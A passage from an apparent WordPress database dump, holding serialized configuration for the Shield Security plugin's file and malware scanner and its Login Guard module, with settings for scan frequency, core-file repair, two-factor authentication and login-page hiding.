Scanner\";s:11:\"description\";s:66:\"Scan your WordPress.org assets for whether they\'ve been abandoned.\";}i:6;a:9:{s:3:\"key\";s:31:\"enable_core_file_integrity_scan\";s:7:\"section\";s:16:\"section_scan_wcf\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:23:\"https://shsec.io/wpsf36\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf37\";s:4:\"name\";s:20:\"WP Core File Scanner\";s:7:\"summary\";s:56:\"Automatically Scans WordPress Core Files For Alterations\";s:11:\"description\";s:145:\"Compares all WordPress core files on your site against the official WordPress files. WordPress Core files should never be altered for any reason.\";}i:7;a:9:{s:3:\"key\";s:24:\"attempt_auto_file_repair\";s:7:\"section\";s:16:\"section_scan_wcf\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:23:\"https://shsec.io/wpsf36\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf37\";s:4:\"name\";s:11:\"Auto Repair\";s:7:\"summary\";s:64:\"Automatically Repair WordPress Core Files That Have Been Altered\";s:11:\"description\";s:141:\"Attempts to automatically repair WordPress Core files with the official WordPress file data, for files that have been altered or are missing.\";}i:8;a:11:{s:3:\"key\";s:14:\"scan_frequency\";s:7:\"section\";s:20:\"section_scan_options\";s:7:\"premium\";b:1;s:7:\"default\";i:1;s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:8:{i:0;a:2:{s:9:\"value_key\";s:1:\"1\";s:4:\"text\";s:4:\"Once\";}i:1;a:2:{s:9:\"value_key\";s:1:\"2\";s:4:\"text\";s:24:\"Twice (scan every 12hrs)\";}i:2;a:2:{s:9:\"value_key\";s:1:\"3\";s:4:\"text\";s:25:\"3 Times (scan every 8hrs)\";}i:3;a:2:{s:9:\"value_key\";s:1:\"4\";s:4:\"text\";s:25:\"4 Times (scan every 6hrs)\";}i:4;a:2:{s:9:\"value_key\";s:1:\"6\";s:4:\"text\";s:25:\"6 Times (scan every 4hrs)\";}i:5;a:2:{s:9:\"value_key\";s:1:\"8\";s:4:\"text\";s:25:\"8 Times (scan every 3hrs)\";}i:6;a:2:{s:9:\"value_key\";s:2:\"12\";s:4:\"text\";s:26:\"12 Times (scan every 2hrs)\";}i:7;a:2:{s:9:\"value_key\";s:2:\"24\";s:4:\"text\";s:26:\"24 Times (scan every hour)\";}}s:9:\"link_info\";s:19:\"https://shsec.io/b2\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:14:\"Scan Frequency\";s:7:\"summary\";s:60:\"Number Of Times To Automatically Scan Core Files In 24 Hours\";s:11:\"description\";s:85:\"Default: Once every 24hrs. To improve security, increase the number of scans per day.\";}i:9;a:11:{s:3:\"key\";s:21:\"notification_interval\";s:7:\"section\";s:20:\"section_scan_options\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"7\";s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Repeat Notifications\";s:7:\"summary\";s:46:\"Item Repeat Notifications Suppression Interval\";s:11:\"description\";s:87:\"How long the automated scans should wait before repeating a notification about an item.\";}i:10;a:10:{s:3:\"key\";s:16:\"email_files_list\";s:7:\"section\";s:20:\"section_scan_options\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Email Files List\";s:7:\"summary\";s:61:\"Scan Notification Emails Should Include Full Listing Of Files\";s:11:\"description\";s:78:\"Scanner notification emails will include a summary list of all affected files.\";}i:11;a:10:{s:3:\"key\";s:37:\"enable_unrecognised_file_cleaner_scan\";s:7:\"section\";s:16:\"section_scan_ufc\";s:7:\"default\";s:19:\"enabled_report_only\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:23:\"Automatic Scan Disabled\";}i:1;a:2:{s:9:\"value_key\";s:19:\"enabled_report_only\";s:4:\"text\";s:38:\"Scan Enabled - Send Email Notification\";}i:2;a:2:{s:9:\"value_key\";s:19:\"enabled_delete_only\";s:4:\"text\";s:41:\"Scan Enabled - Automatically Delete Files\";}i:3;a:2:{s:9:\"value_key\";s:21:\"enabled_delete_report\";s:4:\"text\";s:55:\"Scan Enabled - Delete Files and Send Email Notification\";}}s:9:\"link_info\";s:19:\"https://shsec.io/9y\";s:9:\"link_blog\";s:19:\"https://shsec.io/95\";s:4:\"name\";s:26:\"Unrecognised Files Scanner\";s:7:\"summary\";s:45:\"Scans Core Directories For Unrecognised Files\";s:11:\"description\";s:128:\"Scans for, and automatically deletes, any files in your core WordPress folders that are not part of your WordPress installation.\";}i:12;a:9:{s:3:\"key\";s:16:\"ufc_scan_uploads\";s:7:\"section\";s:16:\"section_scan_ufc\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/95\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:12:\"Scan Uploads\";s:7:\"summary\";s:42:\"Scan Uploads Folder For PHP and Javascript\";s:11:\"description\";s:86:\"The Uploads folder is primarily for media, but could be used to store nefarious files.\";}i:13;a:9:{s:3:\"key\";s:14:\"ufc_exclusions\";s:7:\"section\";s:16:\"section_scan_ufc\";s:7:\"default\";a:8:{i:0;s:9:\"error_log\";i:1;s:9:\".htaccess\";i:2;s:9:\".htpasswd\";i:3;s:9:\".user.ini\";i:4;s:7:\"php.ini\";i:5;s:10:\"web.config\";i:6;s:12:\"php_mail.log\";i:7;s:8:\"mail.log\";}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:19:\"https://shsec.io/9z\";s:9:\"link_blog\";s:19:\"https://shsec.io/95\";s:4:\"name\";s:15:\"File Exclusions\";s:7:\"summary\";s:52:\"Provide A List Of Files To Be Excluded From The Scan\";s:11:\"description\";s:89:\"Take a new line for each file you wish to exclude from the scan. No commas are necessary.\";}i:14;a:9:{s:3:\"key\";s:10:\"ic_enabled\";s:7:\"section\";s:14:\"section_non_ui\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:30:\"Enable Integrity Checking Scan\";s:7:\"summary\";s:54:\"Scans For Critical Changes Made To Your WordPress Site\";s:11:\"description\";s:65:\"Detects changes made to your WordPress site outside of WordPress.\";}i:15;a:9:{s:3:\"key\";s:8:\"ic_users\";s:7:\"section\";s:14:\"section_non_ui\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:21:\"Monitor User Accounts\";s:7:\"summary\";s:48:\"Scans For Critical Changes Made To User Accounts\";s:11:\"description\";s:134:\"Detects changes made to critical user account information that were made directly on the database and outside of the WordPress system.\";}i:16;a:11:{s:3:\"key\";s:15:\"mal_scan_enable\";s:7:\"section\";s:16:\"section_scan_mal\";s:7:\"premium\";b:1;s:7:\"default\";s:8:\"disabled\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:2:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:23:\"Automatic Scan Disabled\";}i:1;a:2:{s:9:\"value_key\";s:7:\"enabled\";s:4:\"text\";s:22:\"Automatic Scan Enabled\";}}s:9:\"link_info\";s:19:\"https://shsec.io/fp\";s:9:\"link_blog\";s:19:\"https://shsec.io/fx\";s:4:\"name\";s:22:\"Automatic Malware Scan\";s:7:\"summary\";s:27:\"Enable Malware File Scanner\";s:11:\"description\";s:56:\"When enabled the Malware scanner will run automatically.\";}i:17;a:11:{s:3:\"key\";s:17:\"mal_fp_confidence\";s:7:\"section\";s:16:\"section_scan_mal\";s:7:\"premium\";b:1;s:7:\"default\";s:2:\"75\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:1:\"0\";s:4:\"text\";s:44:\"None - Turn Off Malware Intelligence Network\";}i:1;a:2:{s:9:\"value_key\";s:2:\"25\";s:4:\"text\";s:3:\"Low\";}i:2;a:2:{s:9:\"value_key\";s:2:\"50\";s:4:\"text\";s:6:\"Medium\";}i:3;a:2:{s:9:\"value_key\";s:2:\"75\";s:4:\"text\";s:4:\"High\";}i:4;a:2:{s:9:\"value_key\";s:3:\"100\";s:4:\"text\";s:4:\"Full\";}}s:9:\"link_info\";s:19:\"https://shsec.io/fp\";s:9:\"link_blog\";s:19:\"https://shsec.io/fz\";s:4:\"name\";s:22:\"Automatic Malware Scan\";s:7:\"summary\";s:27:\"Enable Malware File Scanner\";s:11:\"description\";s:56:\"When enabled the Malware scanner will run automatically.\";}i:18;a:10:{s:3:\"key\";s:19:\"mal_autorepair_core\";s:7:\"section\";s:16:\"section_scan_mal\";s:7:\"premium\";b:1;s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"N\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:19:\"Auto-Repair WP Core\";s:7:\"summary\";s:41:\"Automatically Repair WordPress Core Files\";s:11:\"description\";s:71:\"Automatically reinstall any core files found to have potential malware.\";}i:19;a:10:{s:3:\"key\";s:22:\"mal_autorepair_plugins\";s:7:\"section\";s:16:\"section_scan_mal\";s:7:\"premium\";b:1;s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"N\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Auto-Repair WP Plugins\";s:7:\"summary\";s:42:\"Automatically Repair WordPress.org Plugins\";s:11:\"description\";s:70:\"Automatically repair any plugin files found to have potential malware.\";}i:20;a:10:{s:3:\"key\";s:23:\"mal_autorepair_surgical\";s:7:\"section\";s:14:\"section_non_ui\";s:7:\"premium\";b:1;s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"N\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Surgical Auto-Repair\";s:7:\"summary\";s:55:\"Automatically Attempt To Surgically Remove Malware Code\";s:11:\"description\";s:58:\"Attempts to automatically remove code from infected files.\";}i:21;a:11:{s:3:\"key\";s:10:\"ptg_enable\";s:7:\"section\";s:16:\"section_scan_ptg\";s:7:\"premium\";b:1;s:7:\"default\";s:8:\"disabled\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:2:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:13:\"Scan Disabled\";}i:1;a:2:{s:9:\"value_key\";s:7:\"enabled\";s:4:\"text\";s:12:\"Scan Enabled\";}}s:9:\"link_info\";s:19:\"https://shsec.io/bl\";s:9:\"link_blog\";s:19:\"https://shsec.io/bm\";s:4:\"name\";s:20:\"Enable/Disable Guard\";s:7:\"summary\";s:43:\"Enable The Guard For Plugin And Theme Files\";s:11:\"description\";s:90:\"When enabled the Guard will automatically scan for changes to your Plugin and Theme files.\";}i:22;a:10:{s:3:\"key\";s:14:\"ptg_extensions\";s:7:\"section\";s:16:\"section_scan_ptg\";s:7:\"premium\";b:1;s:7:\"default\";a:5:{i:0;s:3:\"php\";i:1;s:4:\"php5\";i:2;s:2:\"js\";i:3;s:3:\"svg\";i:4;s:8:\"htaccess\";}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:19:\"https://shsec.io/bo\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:10:\"File Types\";s:7:\"summary\";s:35:\"The File Types Included In The Scan\";s:11:\"description\";s:78:\"Take a new line for each file extension. No commas(,) or periods(.) necessary.\";}i:23;a:10:{s:3:\"key\";s:19:\"ptg_reinstall_links\";s:7:\"section\";s:16:\"section_scan_ptg\";s:7:\"premium\";b:1;s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"Y\";s:9:\"link_info\";s:19:\"https://shsec.io/bp\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:21:\"Show Re-Install Links\";s:7:\"summary\";s:33:\"Show Re-Install Links For Plugins\";s:11:\"description\";s:78:\"Show links to re-install plugins and offer re-install when activating plugins.\";}i:24;a:5:{s:3:\"key\";s:16:\"ptg_candiskwrite\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"boolean\";s:7:\"default\";b:0;}i:25;a:5:{s:3:\"key\";s:19:\"ptg_candiskwrite_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";b:0;}i:26;a:6:{s:3:\"key\";s:14:\"snapshot_users\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:9:\"sensitive\";b:1;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}i:27;a:5:{s:3:\"key\";s:14:\"rt_file_hashes\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}i:28;a:5:{s:3:\"key\";s:20:\"rt_file_backup_names\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}i:29;a:5:{s:3:\"key\";s:18:\"rt_can_write_files\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}i:30;a:5:{s:3:\"key\";s:14:\"scans_to_build\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}i:31;a:5:{s:3:\"key\";s:12:\"is_scan_cron\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"boolean\";s:7:\"default\";b:0;}i:32;a:5:{s:3:\"key\";s:14:\"mal_fp_reports\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}}s:11:\"definitions\";a:14:{s:10:\"db_classes\";a:2:{s:11:\"scanresults\";s:66:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\Scanner\\Handler\";s:5:\"scanq\";s:68:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\ScanQueue\\Handler\";}s:14:\"all_scan_slugs\";a:6:{i:0;s:3:\"apc\";i:1;s:3:\"mal\";i:2;s:3:\"ptg\";i:3;s:3:\"wpv\";i:4;s:3:\"wcf\";i:5;s:3:\"ufc\";}s:18:\"table_name_scanner\";s:7:\"scanner\";s:21:\"table_columns_scanner\";a:9:{i:0;s:2:\"id\";i:1;s:4:\"hash\";i:2;s:4:\"meta\";i:3;s:4:\"scan\";i:4;s:8:\"severity\";i:5;s:10:\"ignored_at\";i:6;s:11:\"notified_at\";i:7;s:10:\"created_at\";i:8;s:10:\"deleted_at\";}s:20:\"table_name_scanqueue\";s:5:\"scanq\";s:23:\"table_columns_scanqueue\";a:9:{i:0;s:2:\"id\";i:1;s:4:\"scan\";i:2;s:5:\"items\";i:3;s:7:\"results\";i:4;s:4:\"meta\";i:5;s:10:\"started_at\";i:6;s:11:\"finished_at\";i:7;s:10:\"created_at\";i:8;s:10:\"deleted_at\";}s:19:\"url_mal_sigs_simple\";s:96:\"https://raw.githubusercontent.com/scr34m/php-malware-scanner/master/definitions/patterns_raw.txt\";s:18:\"url_mal_sigs_regex\";s:95:\"https://raw.githubusercontent.com/scr34m/php-malware-scanner/master/definitions/patterns_re.txt\";s:23:\"malware_whitelist_paths\";a:3:{i:0;s:18:\"wp-content/wflogs/\";i:1;s:17:\"wp-content/cache/\";i:2;s:25:\"wp-content/icwp/rollback/\";}s:14:\"cron_all_scans\";s:9:\"all-scans\";s:14:\"wcf_exclusions\";a:5:{i:0;s:11:\"readme.html\";i:1;s:11:\"license.txt\";i:2;s:16:\"licens-sv_SE.txt\";i:3;s:20:\"wp-config-sample.php\";i:4;s:11:\"wp-content/\";}s:27:\"wcf_exclusions_missing_only\";a:2:{i:0;s:20:\"wp-admin/install.php\";i:1;s:10:\"xmlrpc.php\";}s:20:\"corechecksum_autofix\";a:3:{i:0;s:20:\"wp-content/index.php\";i:1;s:28:\"wp-content/plugins/index.php\";i:2;s:27:\"wp-content/themes/index.php\";}s:6:\"events\";a:30:{s:14:\"apc_alert_sent\";a:0:{}s:14:\"mal_alert_sent\";a:0:{}s:14:\"ptg_alert_sent\";a:0:{}s:14:\"ufc_alert_sent\";a:0:{}s:14:\"wcf_alert_sent\";a:0:{}s:14:\"wpv_alert_sent\";a:0:{}s:12:\"apc_scan_run\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}s:12:\"mal_scan_run\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}s:12:\"ptg_scan_run\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}s:12:\"ufc_scan_run\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}s:12:\"wcf_scan_run\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}s:12:\"wpv_scan_run\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}s:14:\"apc_scan_found\";a:2:{s:3:\"cat\";i:2;s:6:\"recent\";b:1;}s:14:\"mal_scan_found\";a:2:{s:3:\"cat\";i:3;s:6:\"recent\";b:1;}s:14:\"ptg_scan_found\";a:2:{s:3:\"cat\";i:3;s:6:\"recent\";b:1;}s:14:\"ufc_scan_found\";a:2:{s:3:\"cat\";i:3;s:6:\"recent\";b:1;}s:14:\"wcf_scan_found\";a:2:{s:3:\"cat\";i:3;s:6:\"recent\";b:1;}s:14:\"wpv_scan_found\";a:2:{s:3:\"cat\";i:3;s:6:\"recent\";b:1;}s:23:\"apc_item_repair_success\";a:0:{}s:20:\"apc_item_repair_fail\";a:0:{}s:23:\"mal_item_repair_success\";a:1:{s:6:\"recent\";b:1;}s:20:\"mal_item_repair_fail\";a:0:{}s:23:\"ptg_item_repair_success\";a:0:{}s:20:\"ptg_item_repair_fail\";a:0:{}s:23:\"ufc_item_repair_success\";a:1:{s:6:\"recent\";b:1;}s:20:\"ufc_item_repair_fail\";a:0:{}s:23:\"wcf_item_repair_success\";a:1:{s:6:\"recent\";b:1;}s:20:\"wcf_item_repair_fail\";a:0:{}s:23:\"wpv_item_repair_success\";a:0:{}s:20:\"wpv_item_repair_fail\";a:0:{}}}s:10:\"meta_modts\";i:1582303038;}','yes'),(334241,'shield_mod_config_7bef8897f9602f0837dc8c3e87596e29','a:7:{s:4:\"slug\";s:13:\"login_protect\";s:10:\"properties\";a:13:{s:4:\"slug\";s:13:\"login_protect\";s:4:\"name\";s:11:\"Login Guard\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:12:\"loginprotect\";s:7:\"tagline\";s:83:\"Block brute force attacks and secure user identities with Two-Factor Authentication\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:40;}s:13:\"admin_notices\";a:1:{s:23:\"email-verification-sent\";a:7:{s:2:\"id\";s:23:\"email-verification-sent\";s:8:\"schedule\";s:10:\"conditions\";s:16:\"plugin_page_only\";b:1;s:11:\"can_dismiss\";b:0;s:4:\"type\";s:7:\"warning\";s:12:\"plugin_admin\";s:3:\"yes\";s:11:\"valid_admin\";b:1;}}s:8:\"sections\";a:10:{i:0;a:5:{s:4:\"slug\";s:36:\"section_brute_force_login_protection\";s:7:\"primary\";b:1;s:5:\"title\";s:23:\"Brute Force Login Guard\";s:11:\"title_short\";s:11:\"Brute Force\";s:7:\"summary\";a:2:{i:0;s:87:\"Purpose - Blocks brute force hacking attacks against your login and registration pages.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}}i:1;a:4:{s:4:\"slug\";s:17:\"section_recaptcha\";s:5:\"title\";s:16:\"Google reCAPTCHA\";s:11:\"title_short\";s:9:\"reCAPTCHA\";s:7:\"summary\";a:3:{i:0;s:51:\"Purpose - Adds Google reCAPTCHA to the Login Forms.\";i:1;s:37:\"Recommendation - Keep this turned on.\";i:2;s:109:\"Note - You will need to register for Google reCAPTCHA keys and store them in the Shield \'Dashboard\' settings.\";}}i:2;a:4:{s:4:\"slug\";s:17:\"section_2fa_email\";s:5:\"title\";s:31:\"Email Two-Factor Authentication\";s:11:\"title_short\";s:11:\"2FA - Email\";s:7:\"summary\";a:3:{i:0;s:102:\"Purpose - Verifies the identity of users who log in to your site using email-based one-time-passwords.\";i:1;s:127:\"Recommendation - Use of this feature is highly recommend. However, if your host blocks email sending you may lock yourself out.\";i:2;s:77:\"Note: You may combine multiple authentication factors for increased security.\";}}i:3;a:4:{s:4:\"slug\";s:14:\"section_2fa_ga\";s:5:\"title\";s:46:\"Google Authenticator Two-Factor Authentication\";s:11:\"title_short\";s:26:\"2FA - Google Authenticator\";s:7:\"summary\";a:3:{i:0;s:111:\"Purpose - Verifies the identity of users who log in to your site using Google Authenticator one-time-passwords.\";i:1;s:127:\"Recommendation - Use of this feature is highly recommend. However, if your host blocks email sending you may lock yourself out.\";i:2;s:77:\"Note: You may combine multiple authentication factors for increased security.\";}}i:4;a:4:{s:4:\"slug\";s:30:\"section_yubikey_authentication\";s:5:\"title\";s:33:\"Yubikey Two-Factor Authentication\";s:11:\"title_short\";s:12:\"2FA -Yubikey\";s:7:\"summary\";a:2:{i:0;s:98:\"Purpose - Verifies the identity of users who log in to your site using Yubikey one-time-passwords.\";i:1;s:77:\"Note: You may combine multiple authentication factors for increased security.\";}}i:5;a:4:{s:4:\"slug\";s:34:\"section_multifactor_authentication\";s:5:\"title\";s:27:\"Multi-Factor Authentication\";s:11:\"title_short\";s:13:\"2-Factor Auth\";s:7:\"summary\";a:3:{i:0;s:103:\"Purpose - Verifies the identity of users who log in to your site - i.e. they are who they say they are.\";i:1;s:127:\"Recommendation - Use of this feature is highly recommend. However, if your host blocks email sending you may lock yourself out.\";i:2;s:77:\"Note: You may combine multiple authentication factors for increased security.\";}}i:6;a:4:{s:4:\"slug\";s:22:\"section_rename_wplogin\";s:5:\"title\";s:18:\"Hide WP Login Page\";s:11:\"title_short\";s:15:\"Hide Login Page\";s:7:\"summary\";a:2:{i:0;s:142:\"Purpose - To hide your wp-login.php page from brute force attacks and hacking attempts - if your login page cannot be found, no-one can login.\";i:1;s:145:\"Recommendation - This is not required for complete security and if your site has irregular or inconsistent configuration it may not work for you.\";}}i:7;a:4:{s:4:\"slug\";s:21:\"section_user_messages\";s:5:\"title\";s:13:\"User Messages\";s:11:\"title_short\";s:13:\"User Messages\";s:7:\"summary\";a:3:{i:0;s:51:\"Purpose - Customize the messages shown to visitors.\";i:1;s:70:\"Recommendation - Be sure to change the messages to suit your audience.\";i:2;s:75:\"Hint - To reset any message to its default, enter the text exactly: default\";}}i:8;a:4:{s:4:\"slug\";s:46:\"section_enable_plugin_feature_login_protection\";s:5:\"title\";s:26:\"Disable Login Guard Module\";s:11:\"title_short\";s:7:\"Disable\";s:7:\"summary\";a:2:{i:0;s:91:\"Purpose - Login Guard blocks all automated and brute force attempts to log in to your site.\";i:1;s:55:\"Recommendation - Keep the Login Guard module turned on.\";}}i:9;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:24:{i:0;a:9:{s:3:\"key\";s:20:\"enable_login_protect\";s:7:\"section\";s:46:\"section_enable_plugin_feature_login_protection\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/51\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf03\";s:4:\"name\";s:18:\"Enable Login Guard\";s:7:\"summary\";s:42:\"Enable (or Disable) The Login Guard Module\";s:11:\"description\";s:70:\"Un-Checking this option will completely disable the Login Guard module\";}i:1;a:10:{s:3:\"key\";s:19:\"rename_wplogin_path\";s:7:\"section\";s:22:\"section_rename_wplogin\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/5q\";s:9:\"link_blog\";s:19:\"https://shsec.io/5r\";s:4:\"name\";s:15:\"Hide Login Page\";s:7:\"summary\";s:31:\"Rename The WordPress Login Page\";s:11:\"description\";s:101:\"Creating a path here will disable your \'wp-login.php\'. Only letters and numbers are permitted: abc123\";}i:2;a:9:{s:3:\"key\";s:29:\"enable_chained_authentication\";s:7:\"section\";s:34:\"section_multifactor_authentication\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/9r\";s:9:\"link_blog\";s:19:\"https://shsec.io/84\";s:4:\"name\";s:27:\"Multi-Factor Authentication\";s:7:\"summary\";s:41:\"Require All Active Authentication Factors\";s:11:\"description\";s:123:\"When enabled, all multi-factor authentication methods will be applied to a user login. Disable to only require one to pass.\";}i:3;a:11:{s:3:\"key\";s:8:\"mfa_skip\";s:7:\"section\";s:34:\"section_multifactor_authentication\";s:7:\"premium\";b:1;s:7:\"default\";i:0;s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:19:\"https://shsec.io/b1\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Multi-Factor By-Pass\";s:7:\"summary\";s:79:\"A User Can By-Pass Multi-Factor Authentication (MFA) For The Set Number Of Days\";s:11:\"description\";s:98:\"Enter the number of days a user can by-pass future MFA after a successful MFA-login. 0 to disable.\";}i:4;a:10:{s:3:\"key\";s:17:\"allow_backupcodes\";s:7:\"section\";s:34:\"section_multifactor_authentication\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/dx\";s:9:\"link_blog\";s:19:\"https://shsec.io/dy\";s:4:\"name\";s:18:\"Allow Backup Codes\";s:7:\"summary\";s:37:\"Allow Users To Generate A Backup Code\";s:11:\"description\";s:95:\"Allow users to generate a backup code that can be used to login if MFA factors are unavailable.\";}i:5;a:9:{s:3:\"key\";s:27:\"enable_google_authenticator\";s:7:\"section\";s:14:\"section_2fa_ga\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:22:\"https://shsec.io/shld7\";s:9:\"link_blog\";s:22:\"https://shsec.io/shld6\";s:4:\"name\";s:27:\"Enable Google Authenticator\";s:7:\"summary\";s:39:\"Allow Users To Use Google Authenticator\";s:11:\"description\";s:101:\"When enabled, users will have the option to add Google Authenticator to their WordPress user profile.\";}i:6;a:9:{s:3:\"key\";s:27:\"enable_email_authentication\";s:7:\"section\";s:17:\"section_2fa_email\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/3t\";s:9:\"link_blog\";s:19:\"https://shsec.io/9q\";s:4:\"name\";s:27:\"Enable Email Authentication\";s:7:\"summary\";s:40:\"Two-Factor Login Authentication By Email\";s:11:\"description\";s:90:\"All users will be required to verify their login by email-based two-factor authentication.\";}i:7;a:10:{s:3:\"key\";s:26:\"two_factor_auth_user_roles\";s:7:\"section\";s:17:\"section_2fa_email\";s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:4:{i:0;s:11:\"contributor\";i:1;s:6:\"author\";i:2;s:6:\"editor\";i:3;s:13:\"administrator\";}s:13:\"value_options\";a:10:{i:0;a:2:{s:9:\"value_key\";s:10:\"subscriber\";s:4:\"text\";s:11:\"Subscribers\";}i:1;a:2:{s:9:\"value_key\";s:11:\"contributor\";s:4:\"text\";s:12:\"Contributors\";}i:2;a:2:{s:9:\"value_key\";s:6:\"author\";s:4:\"text\";s:7:\"Authors\";}i:3;a:2:{s:9:\"value_key\";s:6:\"editor\";s:4:\"text\";s:7:\"Editors\";}i:4;a:2:{s:9:\"value_key\";s:13:\"administrator\";s:4:\"text\";s:14:\"Administrators\";}i:5;a:2:{s:9:\"value_key\";s:8:\"customer\";s:4:\"text\";s:14:\"[Woo] Customer\";}i:6;a:2:{s:9:\"value_key\";s:12:\"shop_manager\";s:4:\"text\";s:22:\"[Woo/EDD] Shop Manager\";}i:7;a:2:{s:9:\"value_key\";s:15:\"shop_accountant\";s:4:\"text\";s:21:\"[EDD] Shop Accountant\";}i:8;a:2:{s:9:\"value_key\";s:11:\"shop_worker\";s:4:\"text\";s:17:\"[EDD] Shop Worker\";}i:9;a:2:{s:9:\"value_key\";s:14:\"edd_subscriber\";s:4:\"text\";s:14:\"[EDD] Customer\";}}s:9:\"link_info\";s:19:\"https://shsec.io/4v\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:30:\"Enforce - Email Authentication\";s:7:\"summary\";s:46:\"All User Roles Subject To Email Authentication\";s:11:\"description\";s:130:\"Enforces email-based authentication on all users with the selected roles. Note: This setting only applies to email 